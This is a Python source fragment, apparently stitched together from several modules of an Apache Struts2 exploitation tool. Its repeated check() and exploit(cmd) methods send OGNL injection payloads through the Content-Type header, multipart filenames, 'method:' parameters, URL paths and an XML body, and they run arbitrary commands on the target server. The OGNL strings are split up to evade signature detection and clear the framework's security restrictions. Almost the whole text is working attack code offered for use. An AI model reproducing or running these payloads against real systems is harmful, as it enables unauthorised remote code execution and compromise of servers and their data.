def exploit(self,cmd):
req=http.Http(self.options)
xx=req.post({'Content-Type':self.payload(cmd),'x-ids':base64.b64encode(cmd)},random.choice('abcdefwx')+'1=123456')
if xx!=None and xx.status_code==200:
try:
x=base64.b64decode(xx.headers['x-ids'])
return '[*] %s' % (x)
except:
return xx.text
return '[!] execute cmd error.'
def exploit(self, cmd):
req = http.Http(self.options)
xx = req.post(
{
'Content-Type': 'application/x-www-form-urlencoded',
'x-ids': base64.b64encode(cmd)
}, 'pic=' + quote(self.payload(cmd)))
if xx != None and xx.status_code == 200:
try:
x = base64.b64decode(xx.headers['x-ids'])
return '[*] %s' % (x)
except:
return xx.text
return '[!] execute cmd error.'
def check(self):
req = http.Http(self.options)
a = '''\
(#context['co'+'m.ope'+'nsymph'+'ony.xwo'+'rk2.disp'+'atcher.Htt'+'pSe'+'rvletRe'+'sponse'].addHeader('x-ids','x123#')).\
(#context['co'+'m.ope'+'nsymph'+'ony.xwo'+'rk2.disp'+'atcher.Htt'+'pSe'+'rvletRe'+'sponse'].getWriter().close())\
'''
xx = req.post({'Content-Type': 'application/x-www-form-urlencoded'},
'pic=' + quote('%{' + a + '}'))
try:
if xx != None and xx.status_code == 200 and xx.headers[
'x-ids'] == 'x123#':
return True
return False
except:
return False
def exploit(self, cmd):
req = http.Http(self.options)
aa = "----------6105\x0d\x0aContent-Disposition:form-data;name=\"x\";filename=\"%s\x00x\"\x0d\x0a\x0d\x0a\x0d\x0a----------6105--\x0d\x0a"
xx = req.post(
{
'Content-Type': 'multipart/form-data;boundary=--------6105',
'x-ids': base64.b64encode(cmd)
}, aa % (self.payload(cmd)))
if xx != None and xx.status_code == 200:
try:
x = base64.b64decode(xx.headers['x-ids'])
return '[*] %s' % (x)
except:
return xx.text
return '[!] execute cmd error.'
def check(self):
req=http.Http(self.options)
a='''\
("multipart/form-data").\
(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#x):(\
(#xx=#context['co'+'m.ope'+'nsymph'+'ony.xwo'+'rk2.Act'+'ionCont'+'ext.co'+'nta'+'iner'].getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).\
(#xx.getExcludedPackageNames().clear()).(#xx.getExcludedClasses().clear()).(#context.setMemberAccess(#x)))).\
(#context['co'+'m.ope'+'nsymph'+'ony.xwo'+'rk2.disp'+'atcher.Htt'+'pSe'+'rvletRe'+'sponse'].addHeader('x-ids','x123#'))\
'''
xx=req.post({'Content-Type':'%{'+a+'}'},random.choice('abcdefwx')+'1=123456')
try:
if xx!=None and xx.status_code==200 and xx.headers['x-ids']=='x123#':
return True
return False
except:
return False
def exploit(self, cmd):
req = http.Http(self.options)
p, c = self.payload(cmd)
a = base64.b64encode(
'com.opensymphony.xwork2.dispatcher.HttpServletResponse')
xx = req.post(
{
'Content-Type': 'application/x-www-form-urlencoded',
'1': a,
'2': base64.b64encode(c),
'3': base64.b64encode('utf-8')
}, 'method:' + quote(p))
if xx != None and xx.status_code == 200:
try:
x = base64.b64decode(xx.headers['1'])
return '[*] %s' % (x)
except:
return xx.text
return '[!] execute cmd error.'
def check(self):
req = http.Http(self.options)
a = '''\
(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#x):(\
(#xx=#context['co'+'m.ope'+'nsymph'+'ony.xwo'+'rk2.Act'+'ionCont'+'ext.co'+'nta'+'iner'].getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).\
(#xx.getExcludedPackageNames().clear()).(#xx.getExcludedClasses().clear()).(#context.setMemberAccess(#x)))).\
(#context['co'+'m.ope'+'nsymph'+'ony.xwo'+'rk2.disp'+'atcher.Htt'+'pSe'+'rvletRe'+'sponse'].addHeader('x-ids','x123#'))\
'''
aa = "----------6105\x0d\x0aContent-Disposition:form-data;name=\"x\";filename=\"%s\x00x\"\x0d\x0a\x0d\x0a\x0d\x0a----------6105--\x0d\x0a"
xx = req.post(
{'Content-Type': 'multipart/form-data;boundary=--------6105'},
aa % ('%{' + a + '}'))
try:
if xx != None and xx.status_code == 200 and xx.headers[
'x-ids'] == 'x123#':
return True
return False
except:
return False
def exploit(self, cmd):
req = http.Http(self.options)
p, c = self.payload(cmd)
req.url = req.url + '/' + quote(p)
xx = req.get({
'1':
base64.b64encode(
'com.opensymphony.xwork2.dispatcher.HttpServletResponse'),
'2':
base64.b64encode(c),
'3':
base64.b64encode('utf-8')
})
if xx != None and xx.status_code == 200:
try:
x = base64.b64decode(xx.headers['1'])
return '[*] %s' % (x)
except:
return xx.text
return '[!] execute cmd error.'
def check(self):
req = http.Http(self.options)
a = '''\
(#[email protected]@DEFAULT_MEMBER_ACCESS).\
(#x=#parameters.%s[0],#context[#x].addHeader(1,@java.lang.System@getProperty(#parameters.%s[0]))).\
(#x=#context[#x].getWriter()).(#x.println(1),#x.flush(),#x.close())?x:x\
'''
a1 = random.choice('abcdefwx') + '1'
a2 = random.choice('abcdefwx') + '2'
xx = req.post(
{'Content-Type': 'application/x-www-form-urlencoded'},
'method:' + quote(a % (a1, a2)) + '&' + a1 +
'=com.opensymphony.xwork2.dispatcher.HttpServletResponse&' + a2 +
'=os.name')
try:
if xx != None and xx.status_code == 200 and len(
xx.headers['1']) > 0:
self.options['OS']['Value'] = xx.headers['1']
return True
return False
except:
return False
def exploit(self,cmd):
req=http.Http(self.options)
cmd=cgi.escape(cmd)
req.post({'Content-Type':'application/xml'},self.payload(cmd))
return '[*] execute cmd finish.'
def check(self):
req=http.Http(self.options)
xx=req.post({'Content-Type':'application/xml'},self.payload(''))
if xx!=None and xx.status_code==500 and xx.text.find('java.lang.String cannot be cast to java.security.Provider$Service')!=-1:
return True
return False
